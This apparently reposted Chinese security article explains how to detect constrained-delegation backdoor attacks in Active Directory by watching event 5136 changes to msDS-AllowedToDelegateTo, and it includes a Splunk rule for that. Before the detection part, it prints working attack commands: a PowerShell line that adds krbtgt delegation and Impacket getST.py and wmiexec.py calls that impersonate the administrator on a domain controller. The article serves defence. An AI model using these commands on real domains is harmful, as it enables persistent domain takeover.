基于AD Event日志监测约束委派攻击

阅读: 评论:0

基于AD Event日志监测约束委派攻击

基于AD Event日志监测约束委派攻击

01、简介

 假设服务账号配置了到域控的约束性委派,当攻击者获取了服务账号,可以作为变种黄金票据,用作后门权限维持。

 基于AD Event日志监测msDS-AllowedToDelegateTo属性的修改,从而发现可疑的约束委派攻击。

02、利用方式

(1)通过powershell添加test用户到krbtgt的约束委派

Import-Module ActiveDirectory
$user = Get-ADUser test
Set-ADObject $user -Add @{"msDS-AllowedToDelegateTo"=@("krbtgt/evil")}

(2)获取域控权限

python getST.py -dc-ip 192.168.44.136 -spn krbtgt -impersonate administrator evil/test:abc123!
set KRB5CCNAME=administratorache
python wmiexec.py -no-pass -k administrator@win-dc01 -dc-ip 192.168.44.136

03、检测方法

攻击手法的核心点在于攻击者需要修改msDS-AllowedToDelegateTo属性,因此我们只需要检测对msDS-AllowedToDelegateTo属性的修改,可以通过5136日志来监控。

5136事件:每次修改 Active Directory 对象时,都会生成此事件,包含帐户名称、目录服务对象名称、属性和操作类型。

安全规则:

index=ad EventCode=5136 "LDAP 显示名称"="msDS-AllowedToDelegateTo"
| rename 类型 as type | eval type=mvindex(type,1)
| stats min(_time) as start_time max(_time) as end_time count by ComputerName user DN type
| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,服务器:"+ComputerName +"疑似遭受约束委派攻击"+count+"次,操作账号:"+user+" 操作对象:"+DN+" 操作类型:"+type
| table start_time end_time user message

效果如下:

本文发布于:2024-02-04 09:26:42,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170704064654360.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:日志   AD   Event
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23